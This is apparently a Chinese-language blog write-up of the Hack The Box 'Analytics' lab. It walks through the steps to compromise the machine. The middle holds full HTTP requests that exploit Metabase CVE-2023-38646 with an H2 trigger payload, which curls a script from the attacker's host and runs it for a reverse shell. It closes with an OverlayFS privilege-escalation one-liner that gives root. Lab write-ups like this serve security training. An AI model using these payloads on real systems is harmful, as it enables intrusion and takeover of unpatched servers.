title: HTB-Analytics
date: 2023-12-14 12:54:18
categories: HTB
tag: 渗透
Analytics
信息收集
nmap扫描同时http访问
换上hosts
10.10.11.233 analytical.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-14 12:55 中国标准时间
Nmap scan report for bogon (10.10.11.233)
Host is up (0.33s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 50.99 seconds
hosts换好后进行目录扫描
查看主页面有一个登录login进去后发现域名是
http://data.analytical.htb/
把hosts添加上
10.10.11.233 data.analytical.htb
查看到cookie是metabase服务
可以试试
Metabase 远程代码执行漏洞(CVE-2023-38646)
反弹shell
首先访问
http://data.analytical.htb/api/session/properties
得到token
"setup-token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
在访问
http://data.analytical.htb/api/setup/validate
构造exp
在本地执行python -m http.server 80
并且写入一个2.sh
POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type:application/json
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=17645f70-ae73-4c86-a81c-ab6fdaa2ccf7
Connection: close
Content-Length: 741
{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl -o /tmp/2.sh http://10.10.14.54/2.sh')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
通过curl得到2.sh并且放在tmp文件夹下
在使用
POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type:application/json
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=17645f70-ae73-4c86-a81c-ab6fdaa2ccf7
Connection: close
Content-Length: 741
{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /tmp/2.sh')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
反弹成功
在使用env可以得到metalytics的账号与密码
然后使用ssh进行登录
metabase里面没有什么内容
ssh连接后id显示1000
在目录下有一个flag
提权
使用sudo -l发现没有用
使用uname
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
查资料发现存在
CVE-2023-2640 and CVE-2023-32629
只需要使用
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
即可获取权限